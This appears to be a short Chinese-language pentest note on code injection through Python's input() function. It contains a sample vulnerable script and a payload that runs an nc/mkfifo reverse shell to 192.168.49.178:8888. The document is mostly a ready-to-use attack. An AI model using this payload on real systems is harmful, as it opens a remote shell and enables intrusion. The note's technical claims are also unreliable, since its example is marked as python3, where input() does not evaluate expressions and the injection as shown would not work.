背景条件
- 源码为python编写的程序
- 该程序包含input函数,利用用户或自动化输入获取参数进行下一步
漏洞函数
- input():接收用户输入且不修改输入的类型
- raw_input():接收用户输入并强制修改为字符串类型
漏洞源码示例
#!/usr/bin/python3
#-*- coding: utf-8 -*-
import smtplib
address = '[email protected]'
data = str(input('report: '))
print('[+] sending the message: ' + str(data))
try:
server = smtplib.SMTP("beerpwn.it", None, None)
server.sendmail("local@bottleneck", address, str(data))
server.close()
except Exception as e:
pass
Payload
../etc/passwd' and __import__("os").system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.49.178 8888 >/tmp/f") and '
获取反弹shell
